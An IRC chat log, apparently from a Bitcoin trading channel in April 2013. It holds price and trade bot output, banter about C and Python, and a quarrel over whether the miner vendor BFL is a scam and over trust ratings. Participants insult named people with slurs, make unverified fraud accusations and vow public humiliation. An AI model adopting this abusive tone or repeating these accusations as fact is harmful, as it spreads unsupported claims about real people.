don't have permission to access /dtng/c/src/133475342584.jpg on this server. Apr 29 13:04:58 Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request. Apr 29 13:05:04 why i fail mp? Apr 29 13:05:13 possibly got banned ? Apr 29 13:05:22 im happy he is sending directly to me in thailand Apr 29 13:05:29 taxes suck... Apr 29 13:05:36 im not sure how i got banned Apr 29 13:05:39 iv never posted Apr 29 13:05:51 maybe you're on a shared ip or som,ething ? Apr 29 13:06:01 are you on one of those pool things ? Apr 29 13:06:22 its synamic, or changes or what not, but i doubt many people here in thailand post on your blog Apr 29 13:06:28 dynamic Apr 29 13:06:53 post probably not, try to spam possibly. Apr 29 13:07:02 not a big deal, but your site rejects me about 255 of the time for some odd reason Apr 29 13:07:17 oh, thailand has some spammers Apr 29 13:07:25 im blocked from 4chan for that reason Apr 29 13:07:35 yeah well that'sd explain it Apr 29 13:08:15 hi Apr 29 13:08:53 mircea_popescu: since when did you enjoy cannibalism art? Apr 29 13:09:38 no idea Apr 29 13:09:39 since forever Apr 29 13:09:49 but as a stock holder im happy Apr 29 13:10:02 yeah really Apr 29 13:10:06 Im a stock holder and Im happy Apr 29 13:10:34 am should sell as many as they can now before bfl fixes their shit Apr 29 13:11:09 Graet https://bitcointalk.org/index.php?topic=164913.0 Apr 29 13:11:13 if you've not seen it Apr 29 13:13:34 [BTCTC] [ASICMINER-PT] 1 @ 1.297 BTC [+] Apr 29 13:13:41 if there is free electric then yeah Apr 29 13:13:52 asics as ytou know are awesome cuz energy use Apr 29 13:14:21 [BTCTC] [ASICMINER-PT] 1 @ 1.2979 BTC [+] Apr 29 13:14:58 [BTCTC] [ASICMINER-PT] 1 @ 1.298 BTC [+] Apr 29 13:15:12 [BTCTC] [BTC-BOND] 11 @ 0.01 = 0.11 BTC [+] Apr 29 13:15:22 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Apr 29 13:15:37 i dont know Apr 29 13:15:45 but that seems high Apr 29 13:16:31 CryptoTrader scammed me out of 500 FC Apr 29 13:16:33 da fuck is a fc ? Apr 29 13:16:51 feather coin? Apr 29 13:17:11 [BTCTC] [ASICMINER-PT] 1 @ 1.298 BTC [+] Apr 29 13:17:24 yeah i dont know Apr 29 13:20:50 Hi, I want to borrow 782.1 BTC. Apr 29 13:20:58 me too Apr 29 13:21:01 ;;calc 782 * 134 Apr 29 13:21:01 104788 Apr 29 13:21:12 100k loan w/o any of rthe paperwork. Apr 29 13:21:44 he wants to copy zefir's plan, with opm Apr 29 13:21:49 well... that finland guy is suposidly sending me 1`00k with no paperwork Apr 29 13:22:02 opm? Apr 29 13:22:09 other people's money Apr 29 13:22:22 any loan over 100 btc should require sexual favors for life Apr 29 13:22:23 ahh Apr 29 13:22:33 zefir is build the asics guy right? Apr 29 13:22:38 the avlon stuff? Apr 29 13:23:44 yeah Apr 29 13:23:47 https://twitter.com/ryandickherber/status/328178648463069186 Apr 29 13:23:57 lmao... wasn't i saying this last month ? Apr 29 13:24:32 charged with what? Apr 29 13:25:38 the germans are investigationg a phishing ring Apr 29 13:26:04 oh really? Apr 29 13:26:16 i guess i just dont know enought about bitcoin 24 Apr 29 13:29:06 oh wow mircea_popescu is awake Apr 29 13:29:11 but I guess it is like evening there Apr 29 13:29:25 it's actually noon in europe Apr 29 13:29:31 i know Apr 29 13:29:43 it's like 6 AM here Apr 29 13:29:48 oh, sorry you weren't talking about europe Apr 29 13:29:51 and probably fucking night time already in asian Apr 29 13:29:57 asia* Apr 29 13:30:27 mircea_popescu was last awake around the time Game of Thrones was on Apr 29 13:30:38 ;;google install python-egg Apr 29 13:30:39 A small introduction to Python Eggs - MrTopf: ; setuptools 0.6c11 : Python Package Index: ; [Tutor] How do you install EGG files - python.org Mailing Lists: Apr 29 13:31:15 thestringpuller whence this fascination with times ? Apr 29 13:31:28 thestringpuller: it was a good ep Apr 29 13:31:57 lol fucking python eggs Apr 29 13:32:03 [BTCTC] [PAJKA.BOND] 5 @ 0.10629 = 0.5315 BTC [+] Apr 29 13:32:04 another reason not to use python Apr 29 13:32:37 :D Apr 29 13:32:51 I don't have time to write C. Apr 29 13:33:03 Nor teach anyone C. Apr 29 13:33:08 heh Apr 29 13:33:17 Yes C is awesome. Best language ever. Apr 29 13:33:26 But it takes a long time to learn, and a long time to use. Apr 29 13:33:31 although rust is looking pretty nifty Apr 29 13:33:53 You probably love C because it's more granular to optimize no? Apr 29 13:34:05 he loves C because he is into BDSM Apr 29 13:34:09 no other reason really Apr 29 13:34:10 Or even to debug per machine :P Apr 29 13:34:14 I like C because it doesn't enforce broken behavior Apr 29 13:34:25 LOL Apr 29 13:34:43 Because its like 30 years old. Apr 29 13:34:57 although I _really_ wish I didn't have to basically ignore the libc Apr 29 13:35:09 too much stuff written in C is thread safe Apr 29 13:35:11 i don't know why would anyone code in C anymore, unless they absolutely had to Apr 29 13:35:21 Scrat: because all other languages suck Apr 29 13:35:54 evernote:///view/30460238/s248/c188c52a-3db4-46c1-84d8-1a38d5b93181/c188c52a-3db4-46c1-84d8-1a38d5b93181/ Apr 29 13:35:56 errr Apr 29 13:35:59 thanks evernote Apr 29 13:36:13 https://www.evernote.com/shard/s248/sh/c188c52a-3db4-46c1-84d8-1a38d5b93181/0312b5aa06a4b1a4c8442272863e87a1 Apr 29 13:36:21 [BTCTC] [B.YABMC] 2 @ 0.016 = 0.032 BTC [-] Apr 29 13:36:30 [BTCTC] [B.YABMC] 8 @ 0.0164 = 0.1312 BTC [+] Apr 29 13:36:59 there, find me a language that does all of that Apr 29 13:37:59 some of this would be blasphemy in to java Apr 29 13:38:13 yes, java is one of those languages that are wrong. Apr 29 13:38:25 for real Apr 29 13:38:48 so are a lot of the java developers i've had to work with Apr 29 13:38:52 I think there are more important matters, for example why the fuck would you have to use an external lib to have simple things like hash maps? Apr 29 13:38:57 hurrr static typing Apr 29 13:39:24 like..you hack code for a living?? really? never seen such people that don't take pride in their code in my life Apr 29 13:39:51 Scrat: well, with C, I'm working on a library that isnt just fucking shit. Apr 29 13:39:54 where I work I have to support dev teams..some of the crap I've seen will make you cringe. Apr 29 13:40:37 C is amazing..and been around a while..probably will be. Apr 29 13:40:44 I never could grasp assembly though Apr 29 13:40:55 its too primitive for me Apr 29 13:41:02 it will be around forever, probably like 90% of internet infrastructure is written in C Apr 29 13:41:21 C/C++ Apr 29 13:41:42 DiabloD3 just had an embolism when I added the ++ Apr 29 13:43:08 LOL Apr 29 13:43:34 he is also a boost hater, and I'll agree with him there Apr 29 13:43:40 but it's needed to cover the suck Apr 29 13:44:03 haha u have a cool way of putting things Apr 29 13:44:46 Scrat: thats why you dont use a shitty language to begin wtih Apr 29 13:48:03 [MPEX] [S.MPOE] 1800 @ 0.00069685 = 1.2543 BTC [+] Apr 29 13:48:09 [MPEX] [S.MPOE] 365 @ 0.00069366 = 0.2532 BTC [-] Apr 29 13:54:40 http://www.allgov.com/news/controversies/judge-sentenced-to-28-years-in-prison-for-selling-kids-to-private-prisons?news=843116 Apr 29 14:05:47 28 years? the last time i heard about that or a differnt story they only got 2 years each Apr 29 14:05:53 i like C. Except for string operations where I need pen and paper to visualize where the pointers end up. Apr 29 14:06:03 sell 700 btc, then we go up... lulz Apr 29 14:06:48 wtf is "juvenile-prison developer"? Apr 29 14:07:07 one that builds prisons for kids Apr 29 14:07:20 oh, there is such a vocation in US nao? Apr 29 14:07:23 that page wont load for me, but im going to guess this is in the usa? Apr 29 14:07:34 Chaang-Noi: just wait, takes time Apr 29 14:07:43 jurov yeah. Apr 29 14:07:43 it failed twice for me Apr 29 14:08:04 Firefox has detected that the server is redirecting the request for this address in a way that will never complete. Apr 29 14:08:06 lol Apr 29 14:08:30 HTTP Error 503. The service is unavailable. Apr 29 14:08:37 pretty sure its just down Apr 29 14:10:00 goat: here for ya http://bitbin.it/GFjNBnZt Apr 29 14:10:34 thanks Apr 29 14:11:12 this is from 2011 Apr 29 14:12:07 i heard about this but thought the judges only got 2 years Apr 29 14:12:13 and i thought there were two of them Apr 29 14:12:34 i saw a documentry on the prision system of the usa and they had a bit on this place Apr 29 14:12:50 one boy got 10 months for tossing a steak at his dad Apr 29 14:13:44 http://www.bbc.co.uk/news/world-asia-22334251 how can they drive that car??? Apr 29 14:21:01 wtf i was dead wrong on market price everything i looked at told me it was supposed to go down Apr 29 14:21:21 i was seeing bouncing cat at first then rising wedge..this must be hype? Apr 29 14:21:21 120 to 165 range for now Apr 29 14:21:32 so mid day dip maybe Apr 29 14:21:41 there is a lot and lot of money pouring into btc now Apr 29 14:22:10 also i just sold 700 btc so there is that too:) it goes up if i sell Apr 29 14:25:18 thanks a lot chaang-noi :P Apr 29 14:25:26 no biggie i've been doing ok Apr 29 14:26:46 ;;ticker Apr 29 14:26:47 BTCUSD ticker | Best bid: 142.50000, Best ask: 142.96302, Bid-ask spread: 0.46302, Last trade: 142.50000, 24 hour volume: 38895.80757496, 24 hour low: 131.52300, 24 hour high: 143.00000, 24 hour vwap: 136.06785 Apr 29 14:30:42 you sold 700 coins to rpietila? ^^ Apr 29 14:33:10 Uglux well agreed to the sale. Apr 29 14:41:42 [MPEX] [S.MPOE] 10000 @ 0.00069113 = 6.9113 BTC [-] Apr 29 14:41:44 [MPEX] [S.MPOE] 1250 @ 0.00069036 = 0.863 BTC [-] Apr 29 14:47:52 jarpiain jborkl jcpham JimmyHo3 jMyles joecool joeykrim jurov Apr 29 14:48:02 lol jurov i see usagi & co are trolling you hard Apr 29 14:52:42 [BTCTC] [BITVPS] 2 @ 0.00072 = 0.0014 BTC [-] Apr 29 14:52:47 [BTCTC] [BITVPS] 98 @ 0.00072 = 0.0706 BTC [-] Apr 29 14:58:02 [MPEX] [S.MPOE] 1199 @ 0.00067649 = 0.8111 BTC [-] Apr 29 15:00:11 $avg Apr 29 15:00:12 ThickAsThieves: 135.84 Apr 29 15:02:25 [BTCTC] [S.MPOE-PT] 10 @ 0.000651 = 0.0065 BTC [+] Apr 29 15:03:12 [MPEX] [S.DICE] 466 @ 0.003 = 1.398 BTC [-] Apr 29 15:03:20 [BTCTC] [BTC-BOND] 6 @ 0.00991 = 0.0595 BTC [-] Apr 29 15:03:31 [BTCTC] [BTC-BOND] 34 @ 0.009901 = 0.3366 BTC [-] Apr 29 15:08:32 ;;next Apr 29 15:08:32 targets: 150, 160-164 | resistance: 136, 140 | support: 120, 118-114, 106-103 | updated by OneFixt at Apr 28 2013, 00:29 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 day, 11 hours, 39 minutes, and 31 seconds ago Apr 29 15:08:38 [BTCTC] [S.MPOE-PT] 25 @ 0.000651 = 0.0163 BTC [+] Apr 29 15:09:00 ;;asks 151 Apr 29 15:09:02 There are currently 11295.425 bitcoins offered at or under 151.0 USD, worth 1664369.15133 USD in total. | Data vintage: 0.0038 seconds Apr 29 15:09:17 ;;bids 122 Apr 29 15:09:17 There are currently 27969.246 bitcoins demanded at or over 122.0 USD, worth 3617338.10143 USD in total. | Data vintage: 15.3214 seconds Apr 29 15:09:44 ;;eightball 160$ today ? Apr 29 15:09:44 Naturally. Apr 29 15:11:08 second mortgage house Apr 29 15:11:16 Oups wrong windows Apr 29 15:22:17 [BTCTC] [S.DICE-PT] 100 @ 0.002755 = 0.2755 BTC [+] Apr 29 15:22:23 Explosion shakes central Prague, as many as 40 injured Apr 29 15:23:03 [HAVELOCK] [SDICE] 1 @ 0.321 BTC [+] Apr 29 15:25:39 also, since i imagine this is what you folks Apr 29 15:25:43 have been waiting for : Apr 29 15:25:43 http://metro.co.uk/2013/04/27/lingerie-firm-launches-womens-underwear-for-men-3669208/ Apr 29 15:27:05 ;;ticker Apr 29 15:27:05 BTCUSD ticker | Best bid: 143.32440, Best ask: 143.90000, Bid-ask spread: 0.57560, Last trade: 143.32440, 24 hour volume: 42689.49700892, 24 hour low: 131.52300, 24 hour high: 143.99000, 24 hour vwap: 136.88480 Apr 29 15:27:11 what is this now Apr 29 15:27:25 i dun like it Apr 29 15:29:07 [BTCTC] [B.YABMC] 6 @ 0.013 = 0.078 BTC [-] Apr 29 15:41:04 mircea_popescu make it stop Apr 29 15:41:19 kakobrekla hm ? Apr 29 15:41:19 post a blog or a twitter or smth Apr 29 15:41:28 lolwhat Apr 29 15:41:30 ;;ticker Apr 29 15:41:31 BTCUSD ticker | Best bid: 145.11000, Best ask: 145.11110, Bid-ask spread: 0.00110, Last trade: 145.11000, 24 hour volume: 47306.16273368, 24 hour low: 131.52300, 24 hour high: 146.56373, 24 hour vwap: 137.70079 Apr 29 15:41:42 so what's wrong with 145 Apr 29 15:42:04 145 leads to 150 which leads to 160 which leads to 170 Apr 29 15:42:11 madness Apr 29 15:43:09 http://cdn.memegenerator.net/instances/400x/36523623.jpg Apr 29 15:43:10 yes i agree. must be 0 Apr 29 15:43:12 safest. Apr 29 15:45:17 ;;later tell Namworld please pm when you have a couple minutes, thanks! Apr 29 15:45:17 The operation succeeded. Apr 29 15:46:20 bowjob was last seen in #bitcoin-assets 6 days, 13 hours, 39 minutes, and 31 seconds ago: lol Apr 29 15:53:02 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 29 15:54:35 http://polimedia.us/dtng/c/src/134573024371.jpg Apr 29 15:54:45 books are good for you Apr 29 15:55:19 [MPEX] [S.MPOE] 10860 @ 0.00067147 = 7.2922 BTC [-] Apr 29 15:57:03 [MPEX] [S.MPOE] 42006 @ 0.00068157 = 28.63 BTC [+] Apr 29 15:57:07 [MPEX] [S.MPOE] 15508 @ 0.00068592 = 10.6372 BTC [+] Apr 29 15:57:09 [MPEX] [S.MPOE] 27935 @ 0.00069141 = 19.3145 BTC [+] Apr 29 15:57:10 [MPEX] [S.MPOE] 12450 @ 0.00069621 = 8.6678 BTC [+] Apr 29 15:57:11 [MPEX] [S.MPOE] 2101 @ 0.00069808 = 1.4667 BTC [+] Apr 29 15:59:23 [MPEX] [O.USD.C140T] 200 @ 0.14768654 = 29.5373 BTC [-] Apr 29 16:08:13 [BTCTC] [PAJKA.BOND] 1 @ 0.103 BTC [-] Apr 29 16:13:01 [HAVELOCK] [VTX] 10 @ 0.4811 = 4.811 BTC [+] Apr 29 16:13:02 [HAVELOCK] [VTX] 35 @ 0.4812 = 16.842 BTC [+] Apr 29 16:13:04 [HAVELOCK] [VTX] 12 @ 0.482 = 5.784 BTC [+] Apr 29 16:17:01 [HAVELOCK] [SDICE] 29 @ 0.32 = 9.28 BTC [-] Apr 29 16:20:08 ;;ticker Apr 29 16:20:08 BTCUSD ticker | Best bid: 146.34300, Best ask: 146.99999, Bid-ask spread: 0.65699, Last trade: 146.99999, 24 hour volume: 58139.03194207, 24 hour low: 131.52300, 24 hour high: 149.08000, 24 hour vwap: 139.47241 Apr 29 16:21:10 https://bitcointalk.org/index.php?topic=93445.msg1974697#msg1974697 Apr 29 16:21:13 mmmmkay Apr 29 16:21:29 a great fuckin loan Apr 29 16:21:34 he got Apr 29 16:22:10 where do i sign up Apr 29 16:32:23 eskimobob alive and kicking: https://bitcointalk.org/index.php?topic=131270.msg1843245#msg1843245 Apr 29 16:36:50 ;;goxlag Apr 29 16:36:51 MtGox lag is 19.402332 seconds. During this time, light travels 0.0388820560887 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 29 16:37:36 ;;goxlag Apr 29 16:37:36 MtGox lag is 55.095492 seconds. During this time, light travels 0.110410749088 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 29 16:38:26 Monday shitstorm !! Goooooooooo ! i need more cheap coin ! Apr 29 16:40:06 doesnt look like cheap to me Apr 29 16:40:41 ;;goxlag Apr 29 16:40:41 MtGox lag is 0.963318 seconds. During this time, light travels 0.00193047848615 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 29 16:42:00 always a little hope when i see 1m lag ! Apr 29 16:43:51 ;;bids 0 Apr 29 16:43:52 There are currently 4.4809135e+08 bitcoins demanded at or over 0.0 USD, worth 20282289.5227 USD in total. | Data vintage: 11.9629 seconds Apr 29 16:44:39 [BTCTC] [BTC-BOND] 6 @ 0.010025 = 0.0602 BTC [+] Apr 29 16:44:54 [BTCTC] [BTC-BOND] 15 @ 0.010025 = 0.1504 BTC [+] Apr 29 16:45:11 [BTCTC] [BTC-BOND] 1 @ 0.010025 BTC [+] Apr 29 16:45:15 [BTCTC] [BTC-BOND] 3 @ 0.010026 = 0.0301 BTC [+] Apr 29 16:46:09 Edge cases such as the month April 2013. Apr 29 16:49:13 [BTCTC] [S.DICE-PT] 1 @ 0.00338 BTC [+] Apr 29 16:56:05 o i got beta access to btc.sx Apr 29 16:56:24 kakobrekla: Apr 29 16:56:30 were you at the mpex first dinner? Apr 29 16:56:35 you were weren't you :P Apr 29 16:57:10 mebbe Apr 29 17:04:25 btc sex ? Apr 29 17:04:50 kakobrekla: you found how to wake mircea_popescu up Apr 29 17:05:07 i was up already! Apr 29 17:06:00 http://24.media.tumblr.com/tumblr_lp8f57S9c11qmlqdvo1_1280.jpg << hello. this is dawg. Apr 29 17:06:26 this is dog indeed Apr 29 17:07:26 heh, i shared my access and apparently their site doesnt work with chrome but it works with ie Apr 29 17:07:31 kinda funny Apr 29 17:08:18 [MPEX] [S.MPOE] 22799 @ 0.00069808 = 15.9155 BTC [+] Apr 29 17:22:34 A maximum of 2 positions may be opened in both directions. This is not recommended unless it is part of a hedging strategy. Apr 29 17:22:36 omg why Apr 29 17:22:49 ill just create 10 accounts then wtf Apr 29 17:25:33 lol wut Apr 29 17:27:02 [MPEX] [S.MPOE] 14433 @ 0.0007083 = 10.2229 BTC [+] Apr 29 17:27:15 this wont go far or end well Apr 29 17:35:41 good wine is good.... Apr 29 17:55:16 Even after seven years of nonstop media hype, only 16 percent of Internet users tweet, the same as the percentage of 14-49-year-olds who have genital herpes. The difference being that the latter are not proud of their affliction, while the former never shut up about theirs. Apr 29 17:55:46 so Apr 29 17:55:55 gential herpes is more successful than twitter Apr 29 17:57:02 [HAVELOCK] [HIM] 2 @ 1.7798 = 3.5596 BTC [+] Apr 29 17:57:02 and genital herpes has no advertisements Apr 29 17:57:28 should I safely assume that no one on twitter has genital herpes? Apr 29 17:57:36 that would be liberating to hear Apr 29 17:57:37 haha Apr 29 17:57:56 lol Apr 29 17:58:21 https://bitcointalk.org/index.php?topic=188516.0;all this shit is so utterly funny... Apr 29 18:00:03 mircea_popescu: moooooo Apr 29 18:00:33 wait I wonder if Im on that list Apr 29 18:00:46 seeing as I am an independent analyst for the bitcoin community Apr 29 18:01:18 depends if you vote with the scammy Luke-Jr fuckwit. Apr 29 18:01:27 well the thing is Apr 29 18:01:29 and incidentally, i have no idea how i forgot this one Apr 29 18:01:29 even if Im not on that list Apr 29 18:01:32 people still email me Apr 29 18:01:42 ;;everify mircea_popescu Apr 29 18:01:43 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-ar;#bitcoin-otc-africa;#bitcoin-otc-bans;#bitcoin-dev;#gribble Apr 29 18:01:57 seriously, like, Ive gotten emails from people from a dozen major sites over the last month Apr 29 18:02:03 ;;eauth mircea_popescu Apr 29 18:02:03 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Apr 29 18:02:05 trying to clarify points for upcoming bitcoin stories Apr 29 18:02:34 ;;everify freenode:#bitcoin-otc:5ea2c50bc98b76e6ca36337ca6830abc919267f94dd8780773123bda Apr 29 18:02:35 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Apr 29 18:02:59 er Apr 29 18:03:14 nanotube: add #bitcoin-assets to that list of authentication channels Apr 29 18:03:34 ;;rate Luke-Jr -1 Most recently, lied about BFL delivery (https://bitcointalk.org/index.php?topic=165500.0;all). Old history of being untrustworthy. Apr 29 18:03:35 Rating entry successful. Your rating for user Luke-Jr has changed from 1 to -1. Apr 29 18:03:45 you know what Apr 29 18:03:48 Im going to do that too Apr 29 18:03:50 Im tired of his shit Apr 29 18:03:56 mircea_popescu: you know what that cunt did recently? Apr 29 18:04:01 he +q'ed me in #-mining Apr 29 18:04:10 because I was telling the truth about BFL when someone asked me Apr 29 18:04:17 lol ok Apr 29 18:04:46 i'm all for it, the bfl/gigavps/lukeetc troop wish to be publicly humiliated, Apr 29 18:04:53 there's plenty of public humiliation to drown them in. Apr 29 18:05:04 I dont even care if they ship anymore Apr 29 18:05:07 it no longer matters Apr 29 18:05:16 the only thing people fail to graps in time is that i am not done when they can't take it anymore, Apr 29 18:05:21 asicminer is in the process of dealing with their 200TH batch Apr 29 18:05:21 i;'m done when i'm done. so... Apr 29 18:05:45 the 200TH will be sold, shipped, and mining by the time BFL starts shipping en masse Apr 29 18:05:54 Diablo u rly want some blade ? Apr 29 18:06:00 error4733: Im considering it Apr 29 18:06:07 the prices went nutty again Apr 29 18:06:14 way way overpriced no ? Apr 29 18:06:26 I think I may just wait for the next round Apr 29 18:06:27 [MPEX] [S.MPOE] 3001 @ 0.00070612 = 2.1191 BTC [-] Apr 29 18:06:37 ;;rate mircea_popescu -2 Delusional troll. I wouldn't trust him with a penny. Apr 29 18:06:38 Rating entry successful. Your rating for user mircea_popescu has changed from -2 to -2. Apr 29 18:06:48 ;;eauth Apr 29 18:06:48 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Apr 29 18:06:51 Luke-Jr get a penny one day, maybe that'll matter. Apr 29 18:06:52 ;;eauth Diablo-D3 Apr 29 18:06:53 Request successful for user Diablo-D3, hostmask DiabloD3!~diablo@pool-70-16-101-85.port.east.myfairpoint.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/85C235C280C197A4 Apr 29 18:07:30 75 btc for first #, expect 45/55 for this one Apr 29 18:07:32 Luke-Jr, is that the guy calling litecoin 51% attacked? Apr 29 18:07:45 lippoper1 he's the guy running the shady pool. Apr 29 18:07:58 or w/e, sold it after driving it into the ground/gave it away/we. Apr 29 18:08:04 lippoper1: ? Apr 29 18:08:24 ;;everify Apr 29 18:08:24 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Apr 29 18:08:28 ;;everify Diablo-D3 Apr 29 18:08:30 Error: Incorrect one-time password. Try again. Apr 29 18:08:33 bah. Apr 29 18:08:38 you already authed Apr 29 18:08:47 Im already authed so I dont give a fuck. Apr 29 18:08:57 I just wonder how mp did that Apr 29 18:09:04 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Apr 29 18:09:16 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Apr 29 18:09:25 DiabloD3 so read the scrollback neh Apr 29 18:09:29 Nick 'DiabloD3', with hostmask 'DiabloD3!~diablo@pool-70-16-101-85.port.east.myfairpoint.net', is identified as user Diablo-D3, with GPG key id 85C235C280C197A4, key fingerprint 16D15E73E75E4BF688E4F2A685C235C280C197A4, and bitcoin address None Apr 29 18:09:34 poor Luke-Jr Apr 29 18:09:43 oh right Im missing the - Apr 29 18:09:49 Litecoin 51% attack with fpga's Apr 29 18:10:09 lippoper1: I know about that, what about it? Apr 29 18:10:35 you're the one starting that thread, what do you know about it? or where can i read up on it? Apr 29 18:10:53 ;;rate Luke-Jr -10 Known troll. Apr 29 18:10:54 Rating entry successful. Your rating of -10 for user Luke-Jr has been recorded. Apr 29 18:11:01 -10 is as far as it goes, right? Apr 29 18:11:05 lol Apr 29 18:11:06 i said poor Luke-Jr, cause mircea said you lost your pool or something Apr 29 18:11:08 -9000 Apr 29 18:11:08 is he even positive anymore ? Apr 29 18:11:15 ;;gettrust Luke-Jr Apr 29 18:11:16 Trust relationship from user mircea_popescu to user Luke-Jr: Level 1: -1, Level 2: 19 via 10 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=Luke-Jr Apr 29 18:11:28 ;;getrating Luke-Jr Apr 29 18:11:28 Currently authenticated from hostmask Luke-Jr!~luke-jr@2001:470:5:265:222:4dff:fe50:4c49 . User luke-jr, rated since Sat Feb 5 10:37:04 2011. Cumulative rating 12, from 67 total ratings. Received ratings: 53 positive, 14 negative. Sent ratings: 49 positive, 26 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=luke-jr Apr 29 18:11:36 lippoper1: not at all, it's running great; I just don't have time for it, so I passed it on Apr 29 18:11:55 ;;getrating Diablo-D3 Apr 29 18:11:56 Currently authenticated from hostmask Diablo-D3!~diablo@pool-70-16-101-85.port.east.myfairpoint.net . User Diablo-D3, rated since Mon Apr 25 11:54:20 2011. Cumulative rating 10, from 9 total ratings. Received ratings: 7 positive, 2 negative. Sent ratings: 5 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Diablo-D3 Apr 29 18:11:57 lippoper1: I didn't start that thread.. Apr 29 18:12:09 can you point me to it? Apr 29 18:12:19 no, I didn't know it existed until you said something lol Apr 29 18:12:19 lol luke never fixed that lie Apr 29 18:12:36 lol Apr 29 18:12:38 WTF Apr 29 18:12:45 who runs otc? Apr 29 18:12:54 because lol supa thinks I can ban people on bitcointalk Apr 29 18:13:09 nanotube, and he won't remove ratings Apr 29 18:13:13 Nick 'PsychoticBoy', with hostmask 'PsychoticBoy!~Psychotic@pdpc/supporter/active/psychoticboy', is identified as user PsychoticBoy, with GPG key id 06DC71AFE4DAC520, key fingerprint 9E476C16F877E988110787BC06DC71AFE4DAC520, and bitcoin address None Apr 29 18:13:36 nanotube: remove the ratings from luke and supa. Apr 29 18:13:49 lmao why ? Apr 29 18:13:54 it's a graph dude, not a sum. Apr 29 18:13:54 he won't and he never has. it's against his policy Apr 29 18:13:56 Currently authenticated from hostmask PsychoticBoy!~Psychotic@pdpc/supporter/active/psychoticboy . User PsychoticBoy, rated since Tue May 1 12:39:15 2012. Cumulative rating 11, from 5 total ratings. Received ratings: 4 positive, 1 negative. Sent ratings: 4 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=PsychoticBoy Apr 29 18:14:48 Diablo-D3: remove the ratings yourself Apr 29 18:14:53 your ratings are the lies Apr 29 18:15:21 really? you +q'ed me in mining because I told the truth about BFL being a scam Apr 29 18:15:25 well, supa's ratings are probably lies too, but not my concern Apr 29 18:15:32 Diablo-D3: because you lie Apr 29 18:15:35 BFL isn't a scam at all Apr 29 18:15:36 how did I lie? Apr 29 18:15:39 did BFL ship? no. Apr 29 18:15:44 even if they ship now, its too late Apr 29 18:15:52 they cant undo the fact they're a scam Apr 29 18:15:58 they can ship thousands of TH, and its too late Apr 29 18:16:03 articles say theyve shipped 40 or so units Apr 29 18:16:03 yes Apr 29 18:16:05 they did ship Apr 29 18:16:08 that's quite besides the point anyway. bitcoin mining isd about mining. Apr 29 18:16:13 whatever thats worth Apr 29 18:16:15 and they never were a scam Apr 29 18:16:16 whether he's an idiot or not, Diablo-D3 still is part of bitcoin mining. Apr 29 18:16:30 mircea_popescu: doesn't give him the right to slander others Apr 29 18:16:45 I already told Diablo-D3 I'd remove the +q if he promised to stop that Apr 29 18:16:46 how is it slander? I asked BFL repeatedly to prove there was development going on Apr 29 18:16:48 no, you don't have the "right" to come up with offences. Apr 29 18:16:53 what do youc all sitting on people's money for a year, if not a scam? Apr 29 18:16:53 they never even answered Apr 29 18:16:58 whoever perceives they were "Slandered" is welcome to go to the courts. Apr 29 18:16:59 Diablo-D3: BFL has no obligation to prove anything to you Apr 29 18:17:06 that's where slander has a meaning. here, it's meaningless. Apr 29 18:17:11 if BFL wants the community's money yes they fucking do Apr 29 18:17:22 as a founding member of this community, I have a fucking right to ask the questions. Apr 29 18:17:25 Diablo-D3: you don't represent the community Apr 29 18:17:28 LOL Apr 29 18:17:30 troll Apr 29 18:17:31 this is a little ridiculous, we're arguing with some random lunatic who got a sandwich Apr 29 18:17:39 so now he's going to what, spend his worthless time barking. Apr 29 18:17:41 herp. Apr 29 18:17:44 but it's almost lunch time Apr 29 18:17:57 BFL are scam artists Apr 29 18:17:57 see, this is why I put people on ignore Apr 29 18:18:01 should be here in 2 weeks TM Apr 29 18:18:05 Im just tired of this shit Apr 29 18:18:09 they're jalapenos are nothing more than 6 fpgas running together Apr 29 18:18:11 this is so good, waiting for tiberiusiv to join in Apr 29 18:18:19 lippoper1: 6 FPGAs don't use 30 W Apr 29 18:18:21 Diablo-D3 he'd be on my ignore but normally he has the sense to stfu here so i never bothered. Apr 29 18:18:26 Diablo-D3 whats the point, its the end of the world in 2016 isnt it so? Apr 29 18:18:32 kakobrekla no in 2012. Apr 29 18:18:35 kakobrekla: I was kidding about that. Apr 29 18:18:46 mircea_popescu: yeah, but everyone forgets to add 3.5 years on top of that Apr 29 18:18:47 end of the world = reward halving Apr 29 18:18:50 lippoper1: also, my ASIC runs at 28 Gh/s, explain that Apr 29 18:18:57 mircea_popescu: the reign of satan will be 3.5 years, as long as jesus's ministry Apr 29 18:18:57 let me see it Apr 29 18:19:16 to quote missy-pr, This thread is epic. Calling all neckbeards (jgarzick, gmaxwell, puke-jr &co): YOU FAIL Apr 29 18:19:16 This is because you suck. You're not good enough. The only option you have is exactly how much public humiliation comes with your failure. Apr 29 18:19:16 Knock yourselves out. Apr 29 18:19:18 i want a youtube video of the whole thing running, no hidden cables, no hidden outlets Apr 29 18:19:34 no cables that 